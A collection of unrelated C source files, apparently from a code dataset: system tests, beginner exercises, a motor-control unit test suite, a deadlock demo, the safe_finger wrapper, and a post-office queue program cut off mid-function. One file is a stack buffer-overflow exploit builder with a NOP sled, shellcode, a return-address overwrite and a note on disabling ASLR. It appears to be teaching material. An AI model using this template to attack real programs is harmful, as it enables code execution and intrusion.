/*BEGIN_LEGAL Intel Open Source License Copyright (c) 2002-2016 Intel Corporation. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. Neither the name of the Intel Corporation nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE INTEL OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. END_LEGAL */ /* * This test verifies that Pin correctly clears the DF bit when executing * the application's signal handler. * * This test may also be run natively, bit it fails on older kernels * because older kernels did not correctly clear DF on entry to a signal * handler. (The same bug Pin used to have.) */ #include <stdio.h> #include <signal.h> #include <sys/time.h> int DidTest; int DFSet = 0; int Flags; extern void SetAndClearDF(); extern void SignalHandler(int); int main() { struct sigaction sigact; struct itimerval itval; sigact.sa_handler = SignalHandler; sigact.sa_flags = 0; sigemptyset(&sigact.sa_mask); if (sigaction(SIGALRM, &sigact, 0) == -1) { fprintf(stderr, "Unable to set up handler\n"); return 1; } itval.it_interval.tv_sec = 0; itval.it_interval.tv_usec = 100000; itval.it_value.tv_sec = 0; itval.it_value.tv_usec = 100000; if (setitimer(ITIMER_REAL, &itval, 0) == -1) { fprintf(stderr, "Unable to set up timer\n"); return 1; } /* * Continuously set and clear the DF bit until a signal arrives while DF is set. */ while (!DidTest) SetAndClearDF(); itval.it_value.tv_sec = 0; itval.it_value.tv_usec = 0; if (setitimer(ITIMER_REAL, &itval, 0) == -1) { fprintf(stderr, "Unable to disable timer\n"); return 1; } /* * The signal handler copied the flags to 'Flags'. Make sure the DF bit was * cleared in the handler. */ if (Flags & (1<<10)) { fprintf(stderr, "DF bit set incorrectly in signal handler\n"); return 1; } return 0; }
the_stack_data/22013660.c
#include <stdio.h> #include <stdlib.h> #include <string.h> /** * Example of inject c code * libc - system add : 0x7ffff7e2bcd0 * libc - exit : 0x7ffff7e213c0 * shell env : 0x7fffffffe01b * disable randomize stack sudo sysctl -w kernel.randomize_va_space=0 */ #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 // char shellcode2[] = // "\xb8\x01\x00\x00\x00" // "\xbb\x05\x00\x00\x00" // "\xcd\x80"; // char shellcode[] = // "\xd0\xbc\xe2\xf7\xff\x7f" // system() // "\xc0\x13\xe2\xf7\xff\x7f" // exit() // "\x1b\xe0\xff\xff\xff\x7f"; unsigned char shellcode[] = "\xb0\x01" "\xb3\x05" "\xcd\x80"; unsigned long * get_sp(void) { __asm__("mov %rsp, %rax"); } int main(int argc, char *argv[]) { char *buff, *ptr; unsigned long *addr_ptr, addr; int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE; int i; size_t shellcode_len = strlen(shellcode); if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize + 9))) { printf("Can’t allocate memory.\n"); exit(0); } addr = get_sp() - offset; fprintf(stderr, "Size of PTR: %ldb\n", sizeof(unsigned long *)); fprintf(stderr, "Using address : 0x%lx\n", addr); fprintf(stderr, "Shell code len %lu\n", shellcode_len); ptr = buff; addr_ptr = (unsigned long *)ptr; // add noop instruction for (i = 0; i < bsize / 2; i++) *(ptr++) = NOP; // add shellcode for (i = 0; i < shellcode_len; i++) *(ptr++) = shellcode[i]; // add padding for (i = 0; i < (bsize - (bsize / 2) - (shellcode_len)); i++) *(ptr++) = 'A'; // add jmo address *((unsigned long *)ptr) = addr; printf("%s", buff); }
the_stack_data/140091.c
/*P5.39 Program to multiply two numbers by russian peasant method*/ #include<stdio.h> int main(void) { int a,b,x,y,s=0; printf("Enter two numbers to be multiplied : "); scanf("%d%d",&x,&y); a = x; b = y; while(a>=1) /*Loop till first number reduces to 1*/ { if(a%2!=0) /*If first number is odd*/ s=s+b; /*Add second number to s*/ a/=2; /*Divide first number by 2*/ b*=2; /*Multiply second number by 2*/ } printf("%d * %d = %d\n",x,y,s); return 0; }
the_stack_data/7950817.c
#ifdef TEST #include "test_assert_with_exception.h" #include "unity.h" #include "uz_speedcontrol.h" #include "../uz_piController/uz_piController.h" #include "../uz_signals/uz_signals.h" struct uz_PI_Controller_config config = {0}; float omega_el_rad_per_sec = 0.0f; float n_ref_rpm = 1000.0f; float id_ref_Ampere = 1.0f; float polePairs = 4.0f; float U_zk_Volts = 24.0f; bool ext_clamping = false; struct uz_PMSM_t config_PMSM = {0}; void setUp(void) { config.Kp = 0.00864f; config.Ki = 0.0864f; config.samplingTime_sec = 0.00001f; config.upper_limit = 10.0f; config.lower_limit = -10.0f; omega_el_rad_per_sec = 0.0f; n_ref_rpm = 1000.0f; id_ref_Ampere = 1.0f; U_zk_Volts = 24.0f; ext_clamping = false; config_PMSM.R_ph_Ohm = 0.08f; config_PMSM.Ld_Henry = 0.00027f; config_PMSM.Lq_Henry = 0.00027f; config_PMSM.Psi_PM_Vs = 0.0082f; config_PMSM.polePairs = 4.0f; config_PMSM.I_max_Ampere = 10.0f; } void test_uz_SpeedControl_sample_NULL(void){ setUp(); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(NULL, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_Rph_negative(void){ setUp(); config_PMSM.R_ph_Ohm = -0.08f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_Rph_zero(void){ setUp(); config_PMSM.R_ph_Ohm = 0.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_Ld_negative(void){ setUp(); config_PMSM.Ld_Henry = -0.08f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_Ld_zero(void){ setUp(); config_PMSM.Ld_Henry = 0.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_Lq_negative(void){ setUp(); config_PMSM.Lq_Henry = -0.08f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_Lq_zero(void){ setUp(); config_PMSM.Lq_Henry = 0.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_Psi_pm(void){ setUp(); config_PMSM.Psi_PM_Vs = -0.08f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_polePairs_negative(void){ setUp(); config_PMSM.polePairs = -2.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_polePairs_zero(void){ setUp(); config_PMSM.polePairs = 0.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_polePairs_decimal_value(void){ setUp(); config_PMSM.polePairs = 0.5f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_I_max_negative(void){ setUp(); config_PMSM.I_max_Ampere = -5.08f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_I_max_zero(void){ setUp(); config_PMSM.I_max_Ampere = 0.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_U_zk_negative(void){ setUp(); U_zk_Volts = -5.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_assert_U_zk_zero(void){ setUp(); U_zk_Volts = 0.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping)); } void test_uz_SpeedControl_reset_NULL(void){ setUp(); TEST_ASSERT_FAIL_ASSERT(uz_SpeedControl_reset(NULL)); } void test_uz_SpeedControl_sample_output(void){ setUp(); //Values for comparision from simulation //Tests, if the output is as expected from the simulation uz_PI_Controller* instance = uz_SpeedControl_init(config); float values_omega[5]={0.0f, 0.0f, 0.0f, 0.011999f, 0.04947f}; float id_out[5]={1.0f, 1.0f, 1.0f, 1.0f, 1.0f}; float iq_out[5]={3.6191f, 3.6195f, 3.6198f, 3.62f, 3.62f}; for(int i=0;i<5;i++){ omega_el_rad_per_sec = values_omega[i]; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out[i], output.d); TEST_ASSERT_FLOAT_WITHIN(1e-03, iq_out[i], output.q); } } void test_uz_SpeedControl_sample_output_limit(void){ setUp(); //Values for comparision from simulation //Tests, if the integrated output limitation of the controller works n_ref_rpm = 3000.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); float id_out = 1.0f; float iq_out = 9.9499f; omega_el_rad_per_sec = 0.0f; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out, output.d); TEST_ASSERT_FLOAT_WITHIN(1e-03, iq_out, output.q); } void test_uz_SpeedControl_sample_ext_clamping(void){ setUp(); //Values for comparision from simulation //Tests, if ext_clamping is active, that the integrator doesn't rise ext_clamping = true; uz_PI_Controller* instance = uz_SpeedControl_init(config); float values_omega[5]={0.0f, 0.0f, 0.0f, 0.011999f, 0.04947f}; float id_out[5]={1.0f, 1.0f, 1.0f, 1.0f, 1.0f}; float iq_out[5]={3.6191f, 3.6191f, 3.6191f, 3.6190f, 3.6189f}; for(int i=0;i<5;i++){ omega_el_rad_per_sec = values_omega[i]; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out[i], output.d); TEST_ASSERT_FLOAT_WITHIN(1e-03, iq_out[i], output.q); } } void test_uz_SpeedControl_sample_field_weakening_active(void){ setUp(); //Values for comparision from simulation //Tests, if the id_fw_current is correct and the iq_output ist correctly limited n_ref_rpm = 7000.0f; id_ref_Ampere = 0.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); float id_out = -4.332f; float iq_out = 8.582f; omega_el_rad_per_sec = 1675.5f; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out, output.d); TEST_ASSERT_FLOAT_WITHIN(1e-03, iq_out, output.q); } void test_uz_SpeedControl_sample_field_weakening_manual_id_ref(void){ setUp(); //Values for comparision from simulation //Tests, that the manual id_ref is used, if its lower than id_fw_current n_ref_rpm = 7000.0f; id_ref_Ampere = -5.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); float id_out = -5.0f; float iq_out = 8.582f; omega_el_rad_per_sec = 1675.5f; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out, output.d); TEST_ASSERT_FLOAT_WITHIN(1e-03, iq_out, output.q); } void test_uz_SpeedControl_sample_field_weakening_manual_id_ref_too_low(void){ setUp(); //Values for comparision from simulation //Tests, that the manual id_ref is not used, if its lower than -I_max n_ref_rpm = 7000.0f; id_ref_Ampere = -25.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); float id_out = -4.332f; float iq_out = 8.582f; omega_el_rad_per_sec = 1675.5f; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out, output.d); TEST_ASSERT_FLOAT_WITHIN(1e-03, iq_out, output.q); } void test_uz_SpeedControl_sample_field_weakening_manual_id_positive(void){ setUp(); //Values for comparision from simulation //Tests, that a positive manual id_ref is used, if FW is off n_ref_rpm = 2000.0f; id_ref_Ampere = 5.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); float id_out = 5.0f; omega_el_rad_per_sec = 837.75f; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out, output.d); } void test_uz_SpeedControl_sample_field_weakening_manual_id_ref_limit_iq(void){ setUp(); //Values for comparision from simulation //Tests, that the manual id_ref is not used, if its lower than -I_max n_ref_rpm = 7000.0f; id_ref_Ampere = 5.0f; uz_PI_Controller* instance = uz_SpeedControl_init(config); float id_out = 5.0f; float iq_out = 8.66f; omega_el_rad_per_sec = 209.44f; struct uz_dq_t output = uz_SpeedControl_sample(instance, omega_el_rad_per_sec, n_ref_rpm, U_zk_Volts, id_ref_Ampere, config_PMSM, ext_clamping); TEST_ASSERT_FLOAT_WITHIN(1e-03, id_out, output.d); TEST_ASSERT_FLOAT_WITHIN(1e-03, iq_out, output.q); } #endif // TEST
the_stack_data/48520.c
#include<stdio.h> int b[100001]={0}; int main() { int a,m=0,n,k,i=0,j; scanf("%d",&n); for(i=0;i<n;i++) { scanf("%d",&a); b[a]++; } scanf("%d",&k); for(i=100000;i>=0;i--) { if (b[i]!=0){m++;} if(m==k){j=i;break;} } printf("%d %d",j,b[j]); return 0; }
the_stack_data/760321.c
double r_atn2(x,y) float *x, *y; { double atan2(); return( atan2(*x,*y) ); }
the_stack_data/234518904.c
#include <stdio.h> int main() { int num, x, contin=0, contout=0; scanf("%d", &num); for(int i=0;i<num;i++){ scanf("%d", &x); if (x>=10 && x<=20){ contin++; } else{ contout++; } } printf("%d in\n", contin); printf("%d out\n", contout); return 0; }
the_stack_data/141319.c
#include <pthread.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> pthread_mutex_t lock1, lock2; /** * console.log we add here flush for std out * @param str - some string for output */ void consoleLog(const char * str) { printf("%s", str); fflush(stdout); } void *thread1(void *arg) { consoleLog("T1: Started\n"); // pthread_mutex_lock(&lock1); // consoleLog("T1: Job started in resource1..\n"); usleep(2000); consoleLog("T1: Trying to get resource2\n"); pthread_mutex_lock(&lock2); consoleLog("T1: Aquired resource2\n"); pthread_mutex_unlock(&lock2); consoleLog("T1: Job finished in resource2..\n"); // pthread_mutex_unlock(&lock1); // consoleLog("T1: Job finished in resource1..\n"); consoleLog("T1: Finished\n"); pthread_exit(NULL); } void *thread2(void *arg) { consoleLog("T2: Started\n"); // pthread_mutex_lock(&lock2); // consoleLog("T2: Job started in resource2..\n"); usleep(2000); consoleLog("T2: Trying to get resource1\n"); pthread_mutex_lock(&lock1); consoleLog("T2: Aquired resource1\n"); pthread_mutex_unlock(&lock1); consoleLog("T2: Job finished in resource1..\n"); // pthread_mutex_unlock(&lock2); // consoleLog("T2: Job finished in resource2..\n"); consoleLog("T2: Finished\n"); pthread_exit(NULL); } int main(int argc, char *argv[]) { consoleLog("Main: Started\n"); pthread_mutex_init(&lock1, NULL); pthread_mutex_init(&lock2, NULL); pthread_t t1, t2; pthread_create(&t1, NULL, thread1, NULL); pthread_create(&t2, NULL, thread2, NULL); pthread_join(t1, NULL); pthread_join(t2, NULL); consoleLog("Main: Finished\n"); return 0; }
the_stack_data/32949919.c
/* * safe_finger - finger client wrapper that protects against nasty stuff * from finger servers. Use this program for automatic reverse finger * probes, not the raw finger command. * * Build with: cc -o safe_finger safe_finger.c * * The problem: some programs may react to stuff in the first column. Other * programs may get upset by thrash anywhere on a line. File systems may * fill up as the finger server keeps sending data. Text editors may bomb * out on extremely long lines. The finger server may take forever because * it is somehow wedged. The code below takes care of all this badness. * * Author: Wietse Venema, Eindhoven University of Technology, The Netherlands. */ #ifndef lint static char sccsid[] = "@(#) safe_finger.c 1.4 94/12/28 17:42:41"; #endif /* System libraries */ #include <sys/types.h> #include <sys/stat.h> #include <signal.h> #include <stdio.h> #include <ctype.h> #include <pwd.h> extern void exit(); /* Local stuff */ char path[] = "PATH=/bin:/usr/bin:/usr/ucb:/usr/bsd:/etc:/usr/etc:/usr/sbin"; #define TIME_LIMIT 60 /* Do not keep listinging forever */ #define INPUT_LENGTH 100000 /* Do not keep listinging forever */ #define LINE_LENGTH 128 /* Editors can choke on long lines */ #define FINGER_PROGRAM "finger" /* Most, if not all, UNIX systems */ #define UNPRIV_NAME "nobody" /* Preferred privilege level */ #define UNPRIV_UGID 32767 /* Default uid and gid */ int finger_pid; void cleanup(sig) int sig; { kill(finger_pid, SIGKILL); exit(0); } main(argc, argv) int argc; char **argv; { int c; int line_length = 0; int finger_status; int wait_pid; int input_count = 0; struct passwd *pwd; /* * First of all, let's don't run with superuser privileges. */ if (getuid() == 0 || geteuid() == 0) { if ((pwd = getpwnam(UNPRIV_NAME)) && pwd->pw_uid > 0) { setgid(pwd->pw_gid); setuid(pwd->pw_uid); } else { setgid(UNPRIV_UGID); setuid(UNPRIV_UGID); } } /* * Redirect our standard input through the raw finger command. */ if (putenv(path)) { fprintf(stderr, "%s: putenv: out of memory", argv[0]); exit(1); } argv[0] = FINGER_PROGRAM; finger_pid = pipe_stdin(argv); /* * Don't wait forever (Peter Wemm <[email protected]>). */ signal(SIGALRM, cleanup); (void) alarm(TIME_LIMIT); /* * Main filter loop. */ while ((c = getchar()) != EOF) { if (input_count++ >= INPUT_LENGTH) { /* don't listen forever */ fclose(stdin); printf("\n\n Input truncated to %d bytes...\n", input_count - 1); break; } if (c == '\n') { /* good: end of line */ putchar(c); line_length = 0; } else { if (line_length >= LINE_LENGTH) { /* force end of line */ printf("\\\n"); line_length = 0; } if (line_length == 0) { /* protect left margin */ putchar(' '); line_length++; } if (isascii(c) && (isprint(c) || isspace(c))) { /* text */ if (c == '\\') { putchar(c); line_length++; } putchar(c); line_length++; } else { /* quote all other thash */ printf("\\%03o", c & 0377); line_length += 4; } } } /* * Wait until the finger child process has terminated and account for its * exit status. Which will always be zero on most systems. */ while ((wait_pid = wait(&finger_status)) != -1 && wait_pid != finger_pid) /* void */ ; return (wait_pid != finger_pid || finger_status != 0); } /* perror_exit - report system error text and terminate */ void perror_exit(text) char *text; { perror(text); exit(1); } /* pipe_stdin - pipe stdin through program (from my ANSI to OLD C converter) */ int pipe_stdin(argv) char **argv; { int pipefds[2]; int pid; int i; struct stat st; /* * The code that sets up the pipe requires that file descriptors 0,1,2 * are already open. All kinds of mysterious things will happen if that * is not the case. The following loops makes sure that descriptors 0,1,2 * are set up properly. */ for (i = 0; i < 3; i++) { if (fstat(i, &st) == -1 && open("/dev/null", 2) != i) perror_exit("open /dev/null"); } /* * Set up the pipe that interposes the command into our standard input * stream. */ if (pipe(pipefds)) perror_exit("pipe"); switch (pid = fork()) { case -1: /* error */ perror_exit("fork"); /* NOTREACHED */ case 0: /* child */ (void) close(pipefds[0]); /* close reading end */ (void) close(1); /* connect stdout to pipe */ if (dup(pipefds[1]) != 1) perror_exit("dup"); (void) close(pipefds[1]); /* close redundant fd */ (void) execvp(argv[0], argv); perror_exit(argv[0]); /* NOTREACHED */ default: /* parent */ (void) close(pipefds[1]); /* close writing end */ (void) close(0); /* connect stdin to pipe */ if (dup(pipefds[0]) != 0) perror_exit("dup"); (void) close(pipefds[0]); /* close redundant fd */ return (pid); } }
the_stack_data/9512625.c
#include <stdio.h> int main(int argc, char *argv[]) { puts("Hello World."); return 0; }
the_stack_data/76699954.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX_STRING_LENGTH 6 //#define DEBUG #ifdef DEBUG #define IF_DEBUG(x) (x); #else #define IF_DEBUG(x) #endif struct package { char* id; int weight; }; typedef struct package package; struct post_office { int min_weight; int max_weight; package* packages; int packages_count; }; typedef struct post_office post_office; struct town { char* name; post_office* offices; int offices_count; }; int towns_count; typedef struct town town; town* towns; void print_all_packages(town t) { /* Print town's name. */ printf("%s:\r\n", t.name); /* Iterate through town's post offices. */ for (int o = 0; o < t.offices_count; o++) { /* Print post office id. */ printf("\t%d:\r\n", o); /* Iterate through post office's packages. */ for (int p = 0; p < t.offices[o].packages_count; p++) { printf("\t\t%s\r\n", t.offices[o].packages[p].id); } } } #ifdef DEBUG void print_all(void) { printf(" ### print all being ###\r\n"); printf("towns_count = %d\r\n", towns_count); for (int t = 0; t < towns_count; t++) { /* Print town's name. */ printf("Town: %s (offices_count = %d)\r\n", towns[t].name, towns[t].offices_count); /* Iterate through town's post offices. */ for (int o = 0; o < towns[t].offices_count; o++) { /* Print post office id. */ printf("\tOffice: %d (packages_count = %d):\r\n", o, towns[t].offices[o].packages_count); /* Iterate through post office's packages. */ for (int p = 0; p < towns[t].offices[o].packages_count; p++) { printf("\t\tid = %s, weight = %d\r\n", towns[t].offices[o].packages[p].id, towns[t].offices[o].packages[p].weight); } } } printf(" ### print all end ###\r\n"); } void print_office_packages(const int post_office_index, const post_office *o) { /* Print post office id. */ printf("\tOffice %d packages:\r\n", post_office_index); /* Iterate through post office's packages. */ for (int p = 0; p < o->packages_count; p++) { printf("\t\t%s\r\n", o->packages[p].id); } } #endif /* send_all_acceptable_packages: Sometimes two post offices, even in different towns, may organize the following transaction: the first one sends all its packages to the second one. The second one accepts the packages that satisfy the weight condition for the second office and rejects all other ones. These rejected packages return to the first office back and are stored in the same order they were stored before they were sent. The accepted packages move to the tail of the second office's queue in the same order they were stored in the first office. */ void send_all_acceptable_packages(town* source, int source_office_index, town* target, int target_office_index) { void *vptr = NULL; /* Check if source and target post office are the same. */ if ((source == target) && (source_office_index == target_office_index)) { return; } /* Check if index is positive or zero. */ if ((source_office_index < 0) || (target_office_index < 0)) { return; } /* Check if index is in range. */ if ((source_office_index >= source->offices_count) || (target_office_index >= target->offices_count)) { return; } #ifdef DEBUG printf("\r\n ####################### \r\n"); printf("%s()\r\n", __FUNCTION__)); printf("source town: %s, source office: %d\r\n", source->name, source_office_index)); printf("target town: %s, target office: %d\r\n", target->name, target_office_index); print_office_packages(source_office_index, &source->offices[source_office_index]); print_office_packages(target_office_index, &target->offices[target_office_index]); print_all(); #endif /* Initialize accepted packages counter. */ int acceptablePackagesCount = 0; /* Iterate through source post office packages. */ for (int p = 0; p < source->offices[source_office_index].packages_count; p++) { /* If current package "p" satisfies target post office weight... */ if (source->offices[source_office_index].packages[p].weight <= target->offices[target_office_index].max_weight && \ source->offices[source_office_index].packages[p].weight >= target->offices[target_office_index].min_weight) { /* Count the number of accepted packages. */ acceptablePackagesCount++; } } IF_DEBUG(printf("acceptablePackagesCount = %d\r\n", acceptablePackagesCount)); /* If there are no packages to process, return. */ if (acceptablePackagesCount == 0) { return; } /* Realloc target office packages (increase memory by the amount of new packages). */ vptr = realloc(target->offices[target_office_index].packages, sizeof(package) * (target->offices[target_office_index].packages_count + acceptablePackagesCount)); /* Check realloc result. */ if (vptr == NULL) { printf("ERROR: realloc() failed to increase memory.\r\n"); exit(-1); } else { target->offices[target_office_index].packages = vptr; } /* Initialize source head: pointer to first package. */ package* source_head = &source->offices[source_office_index].packages[0]; /* Initialize target tail: pointer to empty queue location in the target office package queue. */ package* target_tail = &target->offices[target_office_index].packages[target->offices[target_office_index].packages_count]; #ifdef DEBUG printf("source office packages_count = %d\r\n", source->offices[source_office_index].packages_count); printf("target office packages_count = %d\r\n", target->offices[target_office_index].packages_count); printf("Iterating through source post office packages...\r\n"); #endif /* Iterate through source post office packages. */ for (int p = 0; p < source->offices[source_office_index].packages_count; p++) { /* If current package "p" satisfies target post office weight... */ if (source->offices[source_office_index].packages[p].weight <= target->offices[target_office_index].max_weight && \ source->offices[source_office_index].packages[p].weight >= target->offices[target_office_index].min_weight) { IF_DEBUG(printf("\tpackage accepted: %s\r\n", source->offices[source_office_index].packages[p].id)); /* We are sending the package from source to target. */ /* Make the pointer in target office point to source office package. */ *target_tail = source->offices[source_office_index].packages[p]; /* Increase target package tail pointer: point to next free package location. */ target_tail++; } else { /* Package "p" was not accepted into target post office. */ /* We might need to requeue the package in source. */ /* If head pointer is not pointing to a currently processed package. */ if (source_head != &source->offices[source_office_index].packages[p]) { IF_DEBUG(printf("\tpackage requeued: %s\r\n", source->offices[source_office_index].packages[p].id)); /* Make the pointer in source package queue point to head package. */ *source_head = source->offices[source_office_index].packages[p]; /* Increase head pointer. */ source_head++; } else { /* Program will get here only if first package from the source is not accepted: but it does not need to be requeued. */ IF_DEBUG(printf("\tpackage not requeued: %s\r\n", source->offices[source_office_index].packages[p].id)); /* Increase head pointer. */ source_head++; } } } /* If all packages were sent, free memory. */ if (source->offices[source_office_index].packages_count == acceptablePackagesCount) { free(source->offices[source_office_index].packages); } else { /* Realloc source office packages (shrink memory by amount of accepted packages). */ vptr = realloc(source->offices[source_office_index].packages, sizeof(package) * (source->offices[source_office_index].packages_count - acceptablePackagesCount)); if (vptr == NULL) { printf("ERROR: realloc() failed to shrink memory.\r\n"); exit(-1); } else { source->offices[source_office_index].packages = vptr; } } /* Fix packages counters. */ target->offices[target_office_index].packages_count += acceptablePackagesCount; source->offices[source_office_index].packages_count -= acceptablePackagesCount; #ifdef DEBUG printf("Fixed package count.\r\n")); printf("source office packages_count = %d\r\n", source->offices[source_office_index].packages_count); printf("target office packages_count = %d\r\n", target->offices[target_office_index].packages_count); print_office_packages(source_office_index, &source->offices[source_office_index]); print_office_packages(target_office_index, &target->offices[target_office_index]); print_all(); IF_DEBUG(printf("\r\n ####################### \r\n")); #endif } town town_with_most_packages(town* towns, int towns_count) { /* Initialize the highest number of packages found. */ int packagesMax = 0; /* Initialize town with most packages index. */ int townMostPackagesIndex = 0; if (towns == NULL || towns_count == 0) { /* Error. */ town err; return err; } /* Iterate through towns. */ for (int t = 0; t < towns_count; t++) { /* Initialize the number of packages for this town. */ int packagesCount = 0; /* Iterate through town's post offices. */ for (int o = 0; o < towns[t].offices_count; o++) { /* Increase the number of packages for this town. */ packagesCount += towns[t].offices[o].packages_count; } /* Check if this town's packages trump the last maximum. */ if (packagesCount > packagesMax) { /* Overwrite with new town. */ townMostPackagesIndex = t; packagesMax = packagesCount; } } return towns[townMostPackagesIndex]; } town* find_town(town* towns, int towns_count, char* name) { if (towns == NULL || towns_count == 0 || name == NULL) { /* Error. 